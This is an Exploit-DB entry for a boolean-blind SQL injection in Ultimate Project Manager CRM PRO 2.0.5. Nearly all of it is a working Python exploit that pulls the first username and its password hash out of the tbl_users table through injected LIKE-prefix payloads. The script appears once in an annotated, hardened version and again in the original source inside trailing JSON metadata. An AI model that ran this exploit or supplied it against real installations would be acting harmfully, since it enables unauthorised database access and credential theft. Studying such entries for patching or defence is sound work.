Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)
2020-10-20T00:00:00
ID EDB-ID:48912 Type exploitdb Reporter Exploit-DB Modified 2020-10-20T00:00:00
Description
# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-09-16 (the upstream header reads "2020-16-09", which is not a valid date; the Exploit-DB entry itself was published 2020-10-20)
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2
# The injection point does not allow UNION-based extraction. Instead, this script
# recovers the first username and its password hash one character at a time with a
# boolean-based blind technique: each request asks whether the secret starts with a
# candidate prefix (LIKE 'prefix%'), and the size of the response body is the oracle.
# Expect one request per candidate character per position.
# Note: the script sends no session cookie or other credentials even though the
# Exploit-DB title calls the issue "Authenticated"; if the target rejects
# unauthenticated requests to /frontend/get_article_suggestion/, add a cookies=
# argument to the request. Also, the shebang that follows is not on line 1 (the
# Exploit-DB header precedes it), so invoke the script explicitly as `python3 <file>`.
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import sys
# The original vulnerability was found on a server whose TLS certificate Python
# could not verify, so requests are sent with verify=False. Be aware that this also
# exposes the tool's own traffic -- which carries the recovered username and hash --
# to an on-path attacker; if you can obtain the target's CA bundle, pass its path as
# verify= instead. Disabling verification makes urllib3 emit an
# InsecureRequestWarning on every request, which the filter below suppresses so the
# character-by-character output stays readable.
import warnings
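# Silence only the warning we knowingly provoke with verify=False (urllib3's
# InsecureRequestWarning, whose text starts with "Unverified HTTPS request").
# The original blanket filterwarnings("ignore") also hid every other warning,
# including ones that point at real problems in the tool itself.
warnings.filterwarnings("ignore", message="Unverified HTTPS request")

host = 'https://testurl.test'  # Change: scheme + host[:port] of the target, no path
# Vulnerable endpoint. A trailing slash on `host` is stripped so that
# 'https://x/' does not turn into 'https://x//frontend/...'.
url = "{}/frontend/get_article_suggestion/".format(host.rstrip('/'))

# Inference alphabet for usernames. Only [0-9a-z]: '_' and '%' are LIKE
# wildcards and would need escaping before they could be tried, and the
# original tries no uppercase letters (presumably relying on a
# case-insensitive collation -- verify against the target). A username
# containing any other character (e.g. '.', '@', '-') stops extraction at
# that position.
chars = '1234567890abcdefghijklmnopqrstuvwxyz'
# Alphabet for the password field, which the script treats as a hex digest.
hex_chars = 'abcdef1234567890'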
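def send_payload(payload, *, timeout=15, verify=False):
    """POST *payload* (a form dict) to the vulnerable endpoint and return the response length.

    The blind-SQLi oracle used by get_first_user()/get_hash() is purely the
    size of the response body: the callers treat anything longer than two
    characters as "condition true".

    Args:
        payload: form fields, e.g. {'search': "<injected string>"}.
        timeout: seconds to wait for connect and for read. The original had no
            timeout, so a single hung request stalled the whole extraction loop.
        verify: TLS verification, passed straight to requests. Defaults to
            False for the reason given in the module header; pass a CA-bundle
            path when you have one, since the responses carry the recovered hash.

    Returns:
        len(response.text) -- characters, not bytes.

    Exits:
        With status 1 on any transport-level error (DNS, connect, TLS handshake,
        timeout). HTTP error statuses are not treated as failures here; the
        caller's length heuristic decides what they mean.
    """
    try:
        response = requests.post(url, data=payload, verify=verify, timeout=timeout)
    except requests.RequestException as e:
        # Narrowed from `except Exception`, which also swallowed programming
        # errors and then discarded the reason; the reason is now printed.
        print('Cannot connect to host. Exit.')
        print('  reason: {}'.format(e))
        sys.exit(1)
    return len(response.text)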
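def _extract_prefix(alphabet, build_payload, probe, max_len):
    """Recover a secret string one character at a time through a boolean oracle.

    Starting from the empty prefix, every character of *alphabet* is appended
    to the prefix recovered so far; build_payload(candidate) yields the request
    that is "true" iff the secret starts with *candidate*, and probe(payload)
    returns the response length, where anything longer than 2 characters is
    taken as true (the same threshold the original used). The first matching
    character is appended and echoed to stdout; when no character matches,
    the prefix is complete.

    Returns the recovered prefix ('' if even the first character matched
    nothing), or its first *max_len* characters if the oracle never stops
    answering true -- e.g. an error page that is always longer than 2
    characters -- which previously looped forever.
    """
    known = ''
    while len(known) < max_len:
        for c in alphabet:
            candidate = known + c
            if probe(build_payload(candidate)) > 2:
                known = candidate
                print(c, end='', flush=True)
                break
        else:
            break  # no character extends the prefix: extraction is complete
    return known


def get_first_user(*, alphabet=None, max_len=255, probe=None):
    """Return the username of whichever tbl_users row `LIMIT 1` yields first.

    Args:
        alphabet: characters to try at each position; defaults to the module
            level `chars`. Only characters that need no LIKE/SQL escaping
            should be used -- '_', '%', '\\' and "'" are interpolated verbatim.
        max_len: upper bound on the recovered length. The column width of
            tbl_users.username is not known here; 255 is merely a ceiling
            against an oracle that never answers false (the original had none).
        probe: request function with send_payload's signature; defaults to
            send_payload. Injectable so the inference logic can be exercised
            without a target.
    """
    if alphabet is None:
        alphabet = chars
    if probe is None:
        probe = send_payload

    def build(prefix):
        # LIKE 'prefix%' is true iff the username starts with prefix.
        return {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(prefix)}

    return _extract_prefix(alphabet, build, probe, max_len)


def get_hash(username, *, alphabet=None, max_len=128, probe=None):
    """Return the stored password hash of *username* as a string of hex characters.

    The script assumes the field holds a SHA-512 hex digest (128 characters),
    which is what the default cap reflects; if it holds something else, the
    hex alphabet stops extraction at the first non-hex character.

    Args:
        username: account to look up. Single quotes are doubled before being
            interpolated into the query so that a name which did not come from
            get_first_user cannot break (or alter) the statement.
        alphabet: characters to try at each position; defaults to `hex_chars`.
        max_len, probe: as in get_first_user.
    """
    if alphabet is None:
        alphabet = hex_chars
    if probe is None:
        probe = send_payload
    safe_user = username.replace("'", "''")

    def build(prefix):
        return {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(safe_user, prefix)}

    return _extract_prefix(alphabet, build, probe, max_len)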
def main():
    """Run the two blind-extraction stages and report the result.

    Stage 1 recovers the first username in tbl_users, stage 2 that user's
    stored password hash. An empty result from either stage aborts with exit
    status 1: an empty prefix means the very first character matched nothing
    (wrong URL, unusable oracle, or a secret outside the alphabet).
    """
    print('Exploit started.')
    print('Guessing username...')
    username = get_first_user()
    if not username:
        print('\nCould not get username! Exit.')
        sys.exit(1)
    print('\nUsername found: {}'.format(username))

    print('Guessing password SHA512 hash...')
    sha = get_hash(username)
    if not sha:
        print('\nCould not get Hash! Exit.')
        sys.exit(1)
    print('\nHash found: {}'.format(sha))


if __name__ == '__main__':
    main()
{"id": "EDB-ID:48912", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)", "description": "", "published": "2020-10-20T00:00:00", "modified": "2020-10-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/48912", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2020-10-20T16:37:10", "viewCount": 523, "enchantments": {"dependencies": {"references": [], "modified": "2020-10-20T16:37:10", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-10-20T16:37:10", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://www.exploit-db.com/download/48912", "sourceData": "# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage\r\n# Date: 2020-16-09\r\n# Exploit Author: nag0mez\r\n# Vendor Homepage: https://ultimatepro.codexcube.com/\r\n# Version: <= 2.0.5\r\n# Tested on: Kali Linux 2020.2\r\n\r\n\r\n# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.\r\n\r\n#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\nimport requests\r\nimport sys\r\n\r\n# The original vulnerability was found on a server with an invalid SSL certificate,\r\n# which Python could not verify. 
I added the verify=False parameter to avoid SSL check.\r\n# The lack of verification results in a warning message from Python.\r\n# To get a clean output, we will ignore all warnings.\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nhost = 'https://testurl.test' # Change\r\nurl = \"{}/frontend/get_article_suggestion/\".format(host)\r\n\r\nchars = '1234567890abcdefghijklmnopqrstuvwxyz'\r\nhex_chars = 'abcdef1234567890'\r\n\r\ndef send_payload(payload):\r\n\ttry:\r\n\t\tresponse = requests.post(url, data=payload, verify=False)\r\n\t\tcontent = response.text\r\n\t\tlength = len(content)\r\n\t\treturn length\r\n\texcept Exception as e:\r\n\t\tprint('Cannot connect to host. Exit.')\r\n\t\tsys.exit(1)\r\n\t\r\n\r\ndef get_first_user():\r\n\tfound = True\r\n\tknown = ''\r\n\r\n\twhile found:\r\n\r\n\t\tfound = False\r\n\t\tfor c in chars:\r\n\t\t\ttest = known + c\r\n\t\t\tpayload = {'search': \"' or (select username from tbl_users limit 1)like'{}%'-- \".format(test)}\r\n\t\t\tlength = send_payload(payload)\r\n\r\n\t\t\tif length > 2:\r\n\t\t\t\tfound = True\r\n\t\t\t\tknown += c\r\n\t\t\t\tprint(c, end='')\r\n\t\t\t\tsys.stdout.flush()\r\n\t\t\t\tbreak\r\n\r\n\treturn known\r\n\r\ndef get_hash(username):\r\n\tfound = True\r\n\tknown = ''\r\n\r\n\twhile found:\r\n\r\n\t\tfound = False\r\n\t\tfor c in hex_chars:\r\n\t\t\ttest = known + c\r\n\t\t\tpayload = {'search': \"' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- \".format(username,test)}\r\n\t\t\tlength = send_payload(payload)\r\n\r\n\t\t\tif length > 2:\r\n\t\t\t\tfound = True\r\n\t\t\t\tknown += c\r\n\t\t\t\tprint(c, end='')\r\n\t\t\t\tsys.stdout.flush()\r\n\t\t\t\tbreak\r\n\r\n\treturn known\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint('Exploit started.')\r\n\tprint('Guessing username...')\r\n\r\n\tusername = get_first_user()\r\n\r\n\tif username != '':\r\n\t\tprint('\\nUsername found: {}'.format(username))\r\n\telse:\r\n\t\tprint('\\nCould not get username! 
Exit.')\r\n\t\tsys.exit(1)\r\n\r\n\tprint('Guessing password SHA512 hash...')\r\n\r\n\tsha = get_hash(username)\r\n\r\n\tif sha != '':\r\n\t\tprint('\\nHash found: {}'.format(sha))\r\n\telse:\r\n\t\tprint('\\nCould not get Hash! Exit.')\r\n\t\tsys.exit(1)", "osvdbidlist": []}